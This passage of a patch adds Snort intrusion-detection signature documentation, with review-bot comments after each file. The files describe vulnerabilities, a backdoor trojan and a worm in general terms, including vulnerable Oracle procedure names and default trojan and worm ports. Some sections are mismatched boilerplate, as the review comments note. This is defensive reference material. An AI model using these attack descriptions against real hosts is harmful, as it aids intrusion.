+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
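Review bot: "Expoit" in Ease of Attack of 3314.txt is a typo. The Attack Scenarios paragraph ("a request for a file with an overly long filename via a network share") does not match the Detailed Information, which describes a malformed DCOM request to an RPC port; one of the two should be corrected. Additional References is empty for an RPC DCOM vulnerability that has a vendor advisory.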
--- /dev/null
+++ b/doc/signatures/3027.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3027
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
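Review bot: "heterogenous" should be "heterogeneous" and "remote server.The problem" is missing a space after the full stop in Detailed Information of 3027.txt. Additional References is empty; a link to the Samba advisory for the integer overflow in 3.0.8 and prior would let operators verify the affected range.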
--- /dev/null
+++ b/doc/signatures/111-4.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+111-4
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected network traffic that indicates
+data has been found outside the expected window for the data in a session.
+
+This is not normal network behavior and may indicate spurious activity
+or a malfunctioning operating system network stack.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+
+-- 
+Ease of Attack: 
+Simple. Many automated packet generation tools exist.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
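Review bot: the Attack Scenarios section of 111-4.txt is empty while Ease of Attack states "Simple. Many automated packet generation tools exist"; either describe the scenario (data arriving outside the expected TCP window, as Detailed Information says) or mark both as NA. "pre-processor" is hyphenated here, whereas the Snort component is normally written "preprocessor".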
--- /dev/null
+++ b/doc/signatures/2668.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+2668
+
+-- 
+Summary: 
+This event is generated when an attempt is made to access the file
+processit.pl.
+
+-- 
+Impact: 
+Information Disclosure.
+
+--
+Detailed Information:
+The script processit.pl returns envirnoment variables used by the server
+hosting the application. This can divulge information valuable to an
+attacker that can be used in further attacks against the host.
+
+--
+Affected Systems:
+	All systems using processit.pl
+
+--
+Attack Scenarios: 
+An attacker can retrieve environment variables by accessing the script
+processit.pl, these can be used in further attacks against the system.
+
+-- 
+Ease of Attack: 
+Simple
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Uninstall the script processit.pl
+
+Only allow usage from authenticated users
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
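Review bot: "envirnoment" in Detailed Information of 2668.txt is a typo, and the Attack Scenarios sentence "accessing the script processit.pl, these can be used" is a comma splice. The two Corrective Action lines lack terminal punctuation, unlike the rest of the patch.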
--- /dev/null
+++ b/doc/signatures/957.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+957
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
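Review bot: "attackers choosing" in the Impact of 957.txt needs an apostrophe. Additional References is empty although the Summary refers to a known vulnerability in Microsoft FrontPage Server Extensions.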
--- /dev/null
+++ b/doc/signatures/2837.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2837
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure rename_shadow_column_group
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
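Review bot: a stray line break in Detailed Information of 2837.txt puts the full stop at the start of the next line ("rename_shadow_column_group" / ". This procedure is included in"); join the two lines. The Affected Systems entry "Oracle Oracle9i" repeats the vendor name, and Additional References is empty for a vulnerability in a specific package procedure.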
--- /dev/null
+++ b/doc/signatures/977.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 977
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
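Review bot: the Sid line in 977.txt puts the number on the same line as the heading ("Sid: 977"), unlike every other file in this patch, and is followed by two blank lines; move the number to its own line. "Information gathering possible administrator access." in the Impact needs punctuation between the two items, and Additional References is followed by two blank lines before the closing "--".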
--- /dev/null
+++ b/doc/signatures/3012.txt
@@ -0,0 +1,79 @@
+Rule: 
+
+--
+Sid: 
+3012
+-- 
+Summary: 
+This event is generated when an attacker attempts to remotely upload and
+execute a file with the RUX the Tick trojan.
+
+-- 
+Impact: 
+If successful, the attacker would gain unauthorized access to an
+affected system, enabling him to upload and execute file on the machine.
+The attacker can use this function to upload additional backdoors to the
+victim's sytem and execute them. 
+
+--
+Detailed Information:
+When executed, RUX the Tick opens up its assigned port (default is
+22222) for communication with the attacker. RUX the Tick has three
+functions: Get Windows Directory, Get System Directory, and Upload And
+Execute File.
+
+Get Windows Directory and Get System Directory are used for
+reconnaissance. Upload And Execute File is mainly used to upload and run
+other backdoors onto the victim's computer.
+
+--
+Affected Systems:
+	Windows 95/98/ME/NT/2000
+
+--
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files
+because they often can be backdoors in disguise. Once the victim
+mistakenly installs the server program, the attacker usually will employ
+an IP scanner program to find the IP addresses of victims that have
+installed the program. Then the attacker enters the IP address, port
+number (which  is assigned to the server program by the attacker:
+default is 22222), and presses the connect button and he has access to
+the computer.
+
+-- 
+Ease of Attack: 
+Simple.
+
+
+-- 
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+
+Corrective Action: 
+Using Windows Task Manager, kill these processes: ruxserver.exe and server.exe
+Use Windows Explorer to find ruxserver.exe and delete the file.
+
+This program may hide itself in the process list and can use different
+names and can exist in many locations on an infected machine.
+
+Keep anti-virus programs updated with the latest definitions.
+
+--
+Contributors:
+Sourcefire Research Team
+Ricky Macatee <rmacatee@sourcefire.com>
+
+-- 
+Additional References:
+
+PestPatrol:
+http://www.pestpatrol.com/PestInfo/R/RUX.ASP
+
+--
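Review bot: missing blank line between the Sid and the following "-- " separator in 3012.txt, typos "sytem" (system) and "execute file" (execute files) in the Impact, and a double space in "which  is" in Attack Scenarios. The Corrective Action should say that "ruxserver.exe" and "server.exe" are default names only, since the next paragraph states the program "can use different names".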
--- /dev/null
+++ b/doc/signatures/580.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+580
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) nisd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port nisd is using.  Attackers can also learn what versions of the nisd protocol are accepted by nisd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as nisd run.  The nisd RPC service implements Network Information Systems (NIS and NIS+).  NIS and NIS+ provide centralized management and distribution of information about resources, such as users and hosts, in a network domain.  A buffer overflow exists because of improper bounds checking, which can lead to execution of arbitrary commands on the host. 
+
+--
+Affected Systems:
+Solaris 2.3 - 2.6 hosts running NIS+.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where nisd runs.  This may be a precursor to accessing nisd.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access nisd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for nisd, not probes of the nisd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the nisd service itself. An attacker may attempt to go directly to the nisd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/677
+
+CERT
+http://www.cert.org/advisories/CA-98.06.nisd.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS21
+
+
+--
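Review bot: double spaces after full stops throughout 580.txt, trailing whitespace on the "Arachnids " reference label, and two blank lines before the closing "--". Detailed Information mentions a buffer overflow in nisd, but the rule only detects the portmap GETPORT probe (as False Negatives correctly states); consider adding the CVE for that overflow next to the CERT link so the two are not conflated.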
--- /dev/null
+++ b/doc/signatures/3236.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3236
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
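Review bot: 3236.txt is identical to 3314.txt earlier in this patch and repeats the same problems: the "Expoit" typo, an Attack Scenarios paragraph about an overly long filename on a network share that does not match the RPC DCOM description, and an empty Additional References section. State what differs between the two rules.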
--- /dev/null
+++ b/doc/signatures/514.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+514
+
+--
+Summary:
+This activity is a sign of a host that has been compromised by the ramen worm, which is attempting to retrieve the worm binaries from a remote system.
+
+--
+Impact:
+Severe; this host issued a request to a malicious web server to download the ramen worm binaries.  After the binaries are downloaded, the compromised host acts as a scanner and could be used to attack other hosts.
+
+--
+Detailed Information:
+This rule looks for GET requests to a compromised webserver running on TCP port 27374.  The compromised webserver serves up the ramen binaries required to continue the propagation of the malicious code.  After the host is compromised, a random number generator selects IP address ranges to scan for other vulnerable hosts.  The ramen worm is wide spread, and affects vulnerable Red Hat Linux 6.2 and 7.0 machines.  The worm exploited well-known vulnerabilities in LPRng, rpc.statd, and wu-ftpd.
+
+--
+Attack Scenarios:
+This is a worm; after it is released, it self-propagates.  Once a vulnerable machine is found, worm binaries are downloaded and the newly compromised machine becomes a scanning agent to further the worm's propagation.
+
+--
+Ease of Attack:
+Simple execution of worm code.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+If the worm code is changed to contact a port other than 27374 tcp, then this rule would not catch the activity.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Original rule writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Mike Poor <mike.poor@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS461
+
+CIAC:
+http://www.ciac.org/ciac/bulletins/l-040.shtml
+
+SANS:
+http://www.sans.org/y2k/ramen.htm
+
+--
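Review bot: Corrective Action is empty. Detailed Information already names the services the worm exploits (LPRng, rpc.statd, wu-ftpd) and says the host issuing the request is itself compromised, so the section should at least say to patch those services on exposed hosts and to take the requesting host offline for rebuilding rather than only cleaning it. Minor: the separator before Additional References carries trailing whitespace ("-- "), unlike the other separators in this file, and "None known" lacks the full stop used elsewhere.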
--- /dev/null
+++ b/doc/signatures/1509.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1509
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
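Review bot: Affected Systems is empty, and nothing in the file says which request pattern sid 1509 actually matches. Detailed Information speaks of web, web application and ftp servers in general while Attack Scenarios is specific to browsing outside the ftp root; the two should agree and Affected Systems should name the server class the rule is written for. Minor: "Rule:  " and the "-- " before Additional References carry trailing whitespace, and "Apply the appropriate vendor supplied patches" is missing its full stop.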
--- /dev/null
+++ b/doc/signatures/100000396.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000396
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "options.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "options.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
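Review bot: the third paragraph of Detailed Information (validating "the credentials of a client host") is generic CGI boilerplate that does not describe a remote file include via "babInstallPath", and Attack Scenarios is built on that same credential-attack boilerplate rather than on file inclusion; suggest dropping the paragraph and keeping both sections specific to the include. Also "running ona web server" should be "running on a web server", "attackers choosing" wants an apostrophe, "an exploitation attempt has been attempted" is redundant (say "may indicate an exploitation attempt"), and the file begins with two blank lines and ends with one, unlike the other files in this patch.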
--- /dev/null
+++ b/doc/signatures/3417.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3417
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
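Review bot: Attack Scenarios ("a request for a file with an overly long filename via a network share") does not match Detailed Information, which describes malformed DCOM requests sent over RPC; one of the two should be corrected so the reader knows what traffic sid 3417 covers. Also "Expoit code exists" should be "Exploit code exists", and Additional References is empty although the Summary calls this a known vulnerability.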
--- /dev/null
+++ b/doc/signatures/3114.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3114
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
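Review bot: there is a stray blank line between the "-- " separator and "Corrective Action:", which breaks the separator-then-heading layout used everywhere else in these files. Several headings and separators in this file ("Rule: ", "Sid: ", "Summary: ", "Impact: ", "-- ") also carry trailing whitespace; stripping it keeps the files uniform for anything that parses them. Additional References is empty although the Summary calls this a known vulnerability.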
--- /dev/null
+++ b/doc/signatures/1033.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1033
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
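Review bot: Summary says the rule fires on "a known vulnerability" in IIS, but Detailed Information says many vulnerabilities exist and "the attack scenarios are legion", so the reader learns nothing about what request pattern sid 1033 actually matches; the description should name the specific condition the rule looks for. Minor: "attackers choosing" wants an apostrophe.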
--- /dev/null
+++ b/doc/signatures/908.txt
@@ -0,0 +1,81 @@
+Rule:
+
+--
+Sid:
+908
+
+--
+Summary:
+This event is generated when an attempt is made to access the 
+administrator screens for Coldfusion server.  A long password can cause 
+a Denial-of-Service.
+
+--
+Impact:
+Denial of Service (DoS). While the risk as a target for password attacks is minor, the administrator login mechanism can be jammed by long passwords, leading to a DoS for the server.
+
+--
+Detailed Information:
+ColdFusion's administrator interface is reachable via:
+
+http://www.target.com/CFIDE/administrator/index.cfm
+
+It is recommended that access to these pages be restricted to trusted 
+IP addresses to prevent them being targets for password attacks.
+
+Further, long passwords create a Denial-of-Service state in the server 
+temporarily.
+
+See Macromedia Security Bulletin (MPSB01-08) for complete information.
+
+--
+Affected Systems:
+ColdFusion versions 4.x for Windows, Solaris, HP-UX, Linux
+
+--
+Attack Scenarios:
+The attacker can access the administration interface for the server and 
+gain control of the application.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+At minimum, restrict access to the administrator mechanism from within 
+the ColdFusion administrator screens.  Only internal, trusted users 
+should be allowed access.  For further protections, use the security 
+capabilities of the webserver or the OS to restrict access to the 
+CFIDE/administrator directory when not needed, or copy/remove the 
+CFIDE/administrator directory completely off the server when not in use 
+(it will be necessary to reload the directory before accessing admin 
+functions, of course).
+
+http://www.macromedia.com/support/coldfusion/ts/documents/tn17254.htm
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Darryl Davidson <ddavidson@talisman-intl.com>
+
+-- 
+Additional References:
+
+Allaire Security Bulletin (ASB00-14)
+http://www.macromedia.com/devnet/security/security_zone/asb00-14.html
+
+CVE-2000-0538
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0538
+
+--
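Review bot: Detailed Information points the reader to Macromedia Security Bulletin MPSB01-08, but Additional References lists only ASB00-14 and CVE-2000-0538; MPSB01-08 should be added there, and the tn17254 link placed under Corrective Action belongs in Additional References as well. Attack Scenarios ("gain control of the application") also overstates what Impact describes (minor password-attack risk, a temporary DoS from long passwords); and "Coldfusion" in the Summary should be "ColdFusion" as in the rest of the file.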
--- /dev/null
+++ b/doc/signatures/2820.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2820
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_columns_from_flavor
+. This procedure is included in
+sys.dbms_repcat_fla_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
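Review bot: in Detailed Information the procedure name drop_columns_from_flavor is split from its full stop by a line break (". This procedure is included in"), which reads as a broken sentence; join it as "...procedure drop_columns_from_flavor. This procedure is included in sys.dbms_repcat_fla_mas." Affected Systems reads "Oracle Oracle9i" (duplicated vendor name), "None Known" is capitalised unlike the other files, and Additional References is empty although the Summary calls this a known vulnerability.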
--- /dev/null
+++ b/doc/signatures/2797.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2797
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
